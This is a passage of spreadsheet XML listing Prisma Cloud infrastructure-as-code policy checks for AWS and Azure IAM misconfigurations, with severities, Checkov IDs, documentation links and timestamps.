      <c r="D1067" t="inlineStr"/>
      <c r="E1067" t="inlineStr"/>
      <c r="F1067" t="inlineStr"/>
      <c r="G1067" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1067" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-sqs</t>
        </is>
      </c>
      <c r="K1067" t="inlineStr">
        <is>
          <t>SQS queue policy is public and access is not restricted to specific services or principals</t>
        </is>
      </c>
      <c r="L1067" t="inlineStr"/>
      <c r="M1067" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1067" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1067" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1067" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1067" t="inlineStr"/>
      <c r="R1067" t="inlineStr"/>
      <c r="S1067" t="inlineStr"/>
      <c r="T1067" t="b">
        <v>0</v>
      </c>
      <c r="U1067" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1067" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-sqs-queue-policy</t>
        </is>
      </c>
      <c r="W1067" t="inlineStr">
        <is>
          <t>Ensure SQS queue policy is not public by only allowing specific services or principals to access it</t>
        </is>
      </c>
      <c r="X1067" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-sqs-queue-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it</t>
        </is>
      </c>
      <c r="Y1067" t="inlineStr"/>
      <c r="Z1067" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_sqs_queue_policy"]}</t>
        </is>
      </c>
      <c r="AA1067" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1067" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1067" t="inlineStr">
        <is>
          <t>CKV_AWS_168</t>
        </is>
      </c>
      <c r="AD1067" t="b">
        <v>1</v>
      </c>
      <c r="AE1067" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1067" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>76a99d50-ac1d-4623-b6f1-16b68d4ca8c7</t>
        </is>
      </c>
      <c r="AI1067" t="inlineStr"/>
      <c r="AJ1067" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1067" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" t="inlineStr"/>
      <c r="B1068" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1068" s="2" t="inlineStr"/>
      <c r="D1068" t="inlineStr"/>
      <c r="E1068" t="inlineStr"/>
      <c r="F1068" t="inlineStr"/>
      <c r="G1068" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1068" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-app</t>
        </is>
      </c>
      <c r="K1068" t="inlineStr">
        <is>
          <t>App Configuration Using Local Authentication</t>
        </is>
      </c>
      <c r="L1068" t="inlineStr"/>
      <c r="M1068" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1068" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1068" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1068" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1068" t="inlineStr"/>
      <c r="R1068" t="inlineStr"/>
      <c r="S1068" t="inlineStr"/>
      <c r="T1068" t="b">
        <v>0</v>
      </c>
      <c r="U1068" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1068" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-app-configuration</t>
        </is>
      </c>
      <c r="W1068" t="inlineStr">
        <is>
          <t>Ensure 'local_auth_enabled' is set to 'False'</t>
        </is>
      </c>
      <c r="X1068" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-184</t>
        </is>
      </c>
      <c r="Y1068" t="inlineStr"/>
      <c r="Z1068" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_app_configuration"]}</t>
        </is>
      </c>
      <c r="AA1068" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1068" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1068" t="inlineStr">
        <is>
          <t>CKV_AZURE_184</t>
        </is>
      </c>
      <c r="AD1068" t="b">
        <v>1</v>
      </c>
      <c r="AE1068" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1068" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>ad67bb80-8e39-495e-9d31-06be93efdb12</t>
        </is>
      </c>
      <c r="AI1068" t="inlineStr"/>
      <c r="AJ1068" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1068" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" t="inlineStr"/>
      <c r="B1069" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1069" s="2" t="inlineStr"/>
      <c r="D1069" t="inlineStr"/>
      <c r="E1069" t="inlineStr"/>
      <c r="F1069" t="inlineStr"/>
      <c r="G1069" t="b">
        <v>1</v>
      </c>
      <c r="H10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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1069" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-app</t>
        </is>
      </c>
      <c r="K1069" t="inlineStr">
        <is>
          <t>App Service is not registered with an Azure Active Directory account</t>
        </is>
      </c>
      <c r="L1069" t="inlineStr"/>
      <c r="M1069" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1069" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1069" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1069" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1069" t="inlineStr"/>
      <c r="R1069" t="inlineStr"/>
      <c r="S1069" t="inlineStr"/>
      <c r="T1069" t="b">
        <v>0</v>
      </c>
      <c r="U1069" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1069" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-app-service</t>
        </is>
      </c>
      <c r="W1069" t="inlineStr">
        <is>
          <t>Ensure that Register with Azure Active Directory is enabled on App Service</t>
        </is>
      </c>
      <c r="X1069" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1</t>
        </is>
      </c>
      <c r="Y1069" t="inlineStr"/>
      <c r="Z1069" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA1069" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1069" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1069" t="inlineStr">
        <is>
          <t>CKV_AZURE_16</t>
        </is>
      </c>
      <c r="AD1069" t="b">
        <v>1</v>
      </c>
      <c r="AE1069" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1069" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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69" t="inlineStr">
        <is>
          <t>8d57d7e0-d820-457b-a355-b9874e475191</t>
        </is>
      </c>
      <c r="AI1069" t="inlineStr"/>
      <c r="AJ1069" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1069" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" t="inlineStr"/>
      <c r="B1070" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1070" s="2" t="inlineStr"/>
      <c r="D1070" t="inlineStr"/>
      <c r="E1070" t="inlineStr"/>
      <c r="F1070" t="inlineStr"/>
      <c r="G1070" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1070" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-container</t>
        </is>
      </c>
      <c r="K1070" t="inlineStr">
        <is>
          <t>Azure ACR admin account is enabled</t>
        </is>
      </c>
      <c r="L1070" t="inlineStr"/>
      <c r="M1070" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1070" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1070" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1070" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1070" t="inlineStr"/>
      <c r="R1070" t="inlineStr"/>
      <c r="S1070" t="inlineStr"/>
      <c r="T1070" t="b">
        <v>0</v>
      </c>
      <c r="U1070" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1070" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-container-registry</t>
        </is>
      </c>
      <c r="W1070" t="inlineStr">
        <is>
          <t>Ensure ACR admin account is disabled</t>
        </is>
      </c>
      <c r="X1070" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-137</t>
        </is>
      </c>
      <c r="Y1070" t="inlineStr"/>
      <c r="Z1070" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA1070" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1070" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1070" t="inlineStr">
        <is>
          <t>CKV_AZURE_137</t>
        </is>
      </c>
      <c r="AD1070" t="b">
        <v>1</v>
      </c>
      <c r="AE1070" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1070" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>bd5b9e38-6dbb-4a53-995f-999bbad09932</t>
        </is>
      </c>
      <c r="AI1070" t="inlineStr"/>
      <c r="AJ1070" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1070" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" t="inlineStr"/>
      <c r="B1071" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1071" s="2" t="inlineStr"/>
      <c r="D1071" t="inlineStr"/>
      <c r="E1071" t="inlineStr"/>
      <c r="F1071" t="inlineStr"/>
      <c r="G1071" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1071" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-container</t>
        </is>
      </c>
      <c r="K1071" t="inlineStr">
        <is>
          <t>Azure ACR enables anonymous image pulling</t>
        </is>
      </c>
      <c r="L1071" t="inlineStr"/>
      <c r="M1071" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1071" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1071" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1071" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1071" t="inlineStr"/>
      <c r="R1071" t="inlineStr"/>
      <c r="S1071" t="inlineStr"/>
      <c r="T1071" t="b">
        <v>0</v>
      </c>
      <c r="U1071" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1071" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-container-registry</t>
        </is>
      </c>
      <c r="W1071" t="inlineStr">
        <is>
          <t>Ensures that ACR disables anonymous pulling of images</t>
        </is>
      </c>
      <c r="X1071" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling</t>
        </is>
      </c>
      <c r="Y1071" t="inlineStr"/>
      <c r="Z1071" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA1071" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1071" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1071" t="inlineStr">
        <is>
          <t>CKV_AZURE_138</t>
        </is>
      </c>
      <c r="AD1071" t="b">
        <v>1</v>
      </c>
      <c r="AE1071" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1071" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>a51f0c50-9178-413b-b23a-e21cd8f8e28b</t>
        </is>
      </c>
      <c r="AI1071" t="inlineStr"/>
      <c r="AJ1071" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1071" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" t="inlineStr"/>
      <c r="B1072" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1072" s="2" t="inlineStr"/>
      <c r="D1072" t="inlineStr"/>
      <c r="E1072" t="inlineStr"/>
      <c r="F1072" t="inlineStr"/>
      <c r="G1072" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1072" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-cosmosdb</t>
        </is>
      </c>
      <c r="K1072" t="inlineStr">
        <is>
          <t>Azure CosmosDB does not have Local Authentication disabled</t>
        </is>
      </c>
      <c r="L1072" t="inlineStr"/>
      <c r="M1072" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1072" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1072" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1072" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1072" t="inlineStr"/>
      <c r="R1072" t="inlineStr"/>
      <c r="S1072" t="inlineStr"/>
      <c r="T1072" t="b">
        <v>0</v>
      </c>
      <c r="U1072" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1072" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-cosmosdb-account</t>
        </is>
      </c>
      <c r="W1072" t="inlineStr">
        <is>
          <t>Ensure that Local Authentication is disabled on CosmosDB</t>
        </is>
      </c>
      <c r="X1072" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled</t>
        </is>
      </c>
      <c r="Y1072" t="inlineStr"/>
      <c r="Z1072" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_cosmosdb_account"]}</t>
        </is>
      </c>
      <c r="AA1072" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1072" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1072" t="inlineStr">
        <is>
          <t>CKV_AZURE_140</t>
        </is>
      </c>
      <c r="AD1072" t="b">
        <v>1</v>
      </c>
      <c r="AE1072" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1072" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>1bd00a0d-831d-4145-a986-59999733b079</t>
        </is>
      </c>
      <c r="AI1072" t="inlineStr"/>
      <c r="AJ1072" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1072" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" t="inlineStr"/>
      <c r="B1073" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1073" s="2" t="inlineStr"/>
      <c r="D1073" t="inlineStr"/>
      <c r="E1073" t="inlineStr"/>
      <c r="F1073" t="inlineStr"/>
      <c r="G1073" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1073" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1073" t="inlineStr">
        <is>
          <t>Azure Event Grid Domain Local Authentication Enabled</t>
        </is>
      </c>
      <c r="L1073" t="inlineStr"/>
      <c r="M1073" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1073" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1073" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1073" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1073" t="inlineStr"/>
      <c r="R1073" t="inlineStr"/>
      <c r="S1073" t="inlineStr"/>
      <c r="T1073" t="b">
        <v>0</v>
      </c>
      <c r="U1073" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1073" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid-domain</t>
        </is>
      </c>
      <c r="W1073" t="inlineStr">
        <is>
          <t>Ensure that Azure Event Grid Domain local Authentication is disabled</t>
        </is>
      </c>
      <c r="X1073" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-195</t>
        </is>
      </c>
      <c r="Y1073" t="inlineStr"/>
      <c r="Z1073" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_eventgrid_domain"]}</t>
        </is>
      </c>
      <c r="AA1073" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1073" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1073" t="inlineStr">
        <is>
          <t>CKV_AZURE_195</t>
        </is>
      </c>
      <c r="AD1073" t="b">
        <v>1</v>
      </c>
      <c r="AE1073" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1073" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>1a04b70a-0a64-499f-ac50-f7fd14e314bf</t>
        </is>
      </c>
      <c r="AI1073" t="inlineStr"/>
      <c r="AJ1073" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1073" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" t="inlineStr"/>
      <c r="B1074" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1074" s="2" t="inlineStr"/>
      <c r="D1074" t="inlineStr"/>
      <c r="E1074" t="inlineStr"/>
      <c r="F1074" t="inlineStr"/>
      <c r="G1074" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1074" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1074" t="inlineStr">
        <is>
          <t>Azure Event Grid Domain Managed Identity Provider is Disabled</t>
        </is>
      </c>
      <c r="L1074" t="inlineStr"/>
      <c r="M1074" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1074" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1074" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1074" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1074" t="inlineStr"/>
      <c r="R1074" t="inlineStr"/>
      <c r="S1074" t="inlineStr"/>
      <c r="T1074" t="b">
        <v>0</v>
      </c>
      <c r="U1074" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1074" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid-domain</t>
        </is>
      </c>
      <c r="W1074" t="inlineStr">
        <is>
          <t>Ensure that Managed identity provider is enabled for Azure Event Grid Domain</t>
        </is>
      </c>
      <c r="X1074" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-194</t>
        </is>
      </c>
      <c r="Y1074" t="inlineStr"/>
      <c r="Z1074" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_eventgrid_domain"]}</t>
        </is>
      </c>
      <c r="AA1074" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1074" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1074" t="inlineStr">
        <is>
          <t>CKV_AZURE_194</t>
        </is>
      </c>
      <c r="AD1074" t="b">
        <v>1</v>
      </c>
      <c r="AE1074" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1074" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>73936326-2f05-4297-893c-694ccce0a21a</t>
        </is>
      </c>
      <c r="AI1074" t="inlineStr"/>
      <c r="AJ1074" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1074" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" t="inlineStr"/>
      <c r="B1075" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1075" s="2" t="inlineStr"/>
      <c r="D1075" t="inlineStr"/>
      <c r="E1075" t="inlineStr"/>
      <c r="F1075" t="inlineStr"/>
      <c r="G1075" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1075" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1075" t="inlineStr">
        <is>
          <t>Azure Event Grid Topic Managed Identity Provider</t>
        </is>
      </c>
      <c r="L1075" t="inlineStr"/>
      <c r="M1075" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1075" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1075" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1075" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1075" t="inlineStr"/>
      <c r="R1075" t="inlineStr"/>
      <c r="S1075" t="inlineStr"/>
      <c r="T1075" t="b">
        <v>0</v>
      </c>
      <c r="U1075" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1075" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid-topic</t>
        </is>
      </c>
      <c r="W1075" t="inlineStr">
        <is>
          <t>Ensure that Managed identity provider is enabled for Azure Event Grid Topic</t>
        </is>
      </c>
      <c r="X1075" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-184</t>
        </is>
      </c>
      <c r="Y1075" t="inlineStr"/>
      <c r="Z1075" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_eventgrid_topic"]}</t>
        </is>
      </c>
      <c r="AA1075" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1075" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1075" t="inlineStr">
        <is>
          <t>CKV_AZURE_191</t>
        </is>
      </c>
      <c r="AD1075" t="b">
        <v>1</v>
      </c>
      <c r="AE1075" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1075" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>8cc12919-a51d-4c8f-b1f4-ba3d83b67ec1</t>
        </is>
      </c>
      <c r="AI1075" t="inlineStr"/>
      <c r="AJ1075" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1075" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" t="inlineStr">
        <is>
          <t>DISA STIG (NON Managed)</t>
        </is>
      </c>
      <c r="B1076" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1076" s="2" t="inlineStr"/>
      <c r="D1076" t="inlineStr"/>
      <c r="E1076" t="inlineStr"/>
      <c r="F1076" t="inlineStr"/>
      <c r="G1076" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1076" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1076" t="inlineStr">
        <is>
          <t>Azure Event Grid Topic Local Authentication Enabled</t>
        </is>
      </c>
      <c r="L1076" t="inlineStr"/>
      <c r="M1076" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1076" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1076" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1076" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1076" t="inlineStr">
        <is>
          <t>Kubernetes</t>
        </is>
      </c>
      <c r="R1076" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="S1076" t="inlineStr"/>
      <c r="T1076" t="b">
        <v>0</v>
      </c>
      <c r="U1076" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1076" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-eventgrid-topic</t>
        </is>
      </c>
      <c r="W1076" t="inlineStr">
        <is>
          <t>Ensure that Azure Event Grid Topic local Authentication is disabled</t>
        </is>
      </c>
      <c r="X1076" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-192</t>
        </is>
      </c>
      <c r="Y1076" t="inlineStr"/>
      <c r="Z1076" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_eventgrid_topic"]}</t>
        </is>
      </c>
      <c r="AA1076" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1076" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1076" t="inlineStr">
        <is>
          <t>CKV_AZURE_192</t>
        </is>
      </c>
      <c r="AD1076" t="b">
        <v>1</v>
      </c>
      <c r="AE1076" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1076" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>9c23129c-bb4c-43db-bb64-d12986190b08</t>
        </is>
      </c>
      <c r="AI1076" t="inlineStr"/>
      <c r="AJ1076" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1076" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" t="inlineStr"/>
      <c r="B1077" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1077" s="2" t="inlineStr"/>
      <c r="D1077" t="inlineStr"/>
      <c r="E1077" t="inlineStr"/>
